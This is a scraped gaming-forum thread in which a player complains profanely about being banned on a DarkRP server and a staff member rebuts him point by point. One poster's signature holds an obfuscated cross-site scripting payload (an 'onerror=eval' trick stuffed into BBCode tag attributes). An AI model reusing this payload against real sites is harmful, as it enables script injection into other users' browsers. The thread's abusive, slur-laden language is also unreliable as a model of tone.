Login to ZARP
Username: Password: Remember me

TOPIC: Cunt Admin

Cunt Admin 7 years 9 months ago #364584

Today I was fucking banned for 2 weeks because I was opening the 3 dumb fuck admins eyes. I noticed a lot of RDM, CDM, RDA, Proppush, ect. I reported like I was supposed to and waited patiently. As I waited in spawn I got rdmed multiple times by multiple people. So instead of waiting I just grabbed my car and tried to get around all the fucktards who were prop pushing my car around and finally got out. I drove around a bit to find a wall around the mines. I got out of my car and investigated. I found 3 admins all afk mining rubies. I was waiting for about 5 minutes to see if they would come back. Of course they didn't so I took action pulled out my colt python and shot the "Super Admin" in the foot. Not even 2 seconds later he comes back to pick me up and freeze me. I was then warned for "attemp RDM." So I go back to my base and come back with a friend. My friend shot 2 people to death and then was frozen by all 3 admins afk'ing. The head-admin took him somewhere while I talked to the most amazing "Super Admin" of all time. I told him how there was all this RDM and rule breaking and he told me that he wasn't going to help a "rule breaker." I said fine. He then gagged me for no reason and that pissed me off so I pulled out my shotgun killed all the admins and got banned. I'm not making a ban appeal because the server is shit. Ill come back if you deal with the shit admins who wont fucking take reports. Please owner get your admins in control because they arent doing their job. The admins names are Jamie, Brandify and I don't remember the Head - Admin's name but can you honestly demote and ban them they need to fucking get punished.
- The one the only
Fucking Pepe, Peace Bitches.
Last Edit: 7 years 9 months ago by Morgan.
The topic has been locked.

Cunt Admin 7 years 9 months ago #364585

Nice wall of text
Try making a report using the template and providing proof.
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

Cunt Admin 7 years 9 months ago #364587

Well, I'd make a big paragraph on stating why you're wrong and incorrect on everything here but I'll just turn these into points with direct quotes from your post.
Today I was fucking banned for 2 weeks because I was opening the 3 dumb fuck admins eyes.

So you knew what you were doing was breaking multiple rules, and did it anyway to prove a point? What were you proving? That if you wanted to break rules you could?
I was waiting for about 5 minutes to see if they would come back. Of course they didn't so I took action pulled out my colt python and shot the "Super Admin" in the foot.

I forgot the staff were robots programmed to only deal with F1s and cant be AFK on the server mining.. They were AFK, I alt tabbed back in and the first thing I see you mowing everyone down, some not even staff, both affecting peoples roleplay and only helping the people breaking the rules in the first place. You were ignorant and blinded with rage from rulebreakers that you couldn't help b ut just take it out on the closest staff member.
He then gagged me for no reason and that pissed me off so I pulled out my shotgun killed all the admins and got banned.

You were gagged for no reason? I'm sorry but this couldn't be farther from the truth. You repeatedly disrespected the staff member multiple times after asking why he gagged you. You were mad that you were punished for a legitimate reason and once again, took your anger out on the closest staff member.
I'm not making a ban appeal because the server is shit.

Simple solution if you don't like it, don't play it. You didn't have to ruin everyone's else's experience and roleplay with your rulebreaks.
Ill come back if you deal with the shit admins who wont fucking take reports.

The staff team do a great job dealing with the staff reports, once I came back from being AFK I dealt with around 5 F1's with other staff members and nearly 3/4th's of them were about you and your friend rulebreaking.

All in all your post is very hypocritical, you yourself were reported to me from around 5-7 different players. One pattern I can see in most of your actions taken tonight were the following:

1) Breaks Rule
2) Denies that the rule was broken
3) Takes it out on nearest player/staff member

You need to learn the rules over your two week ban, and stop taking your anger out on the wrong people. If you were going to be mad at anyone in that situation you should have been upset with the other players you claimed were rulebreaking and most of all your own.
  • Morgan
  • Legendary Member
  • ZARP VIP Golden Blue Badge
  • Thanks received: 6527

Legendary Spectacular Border
MAL
The following user(s) said Thank You: i7moody009, Jamie.
Time to create page: 0.084 seconds

179 PLAYERS ONLINE

Connect to server View Gametracker DarkRP 1
4/127
Connect to server View Gametracker Deathrun
0/40
Connect to server View Gametracker TTT
0/47
Connect to server View Gametracker Bhop
3/32
Connect to server View Gametracker Surf
4/32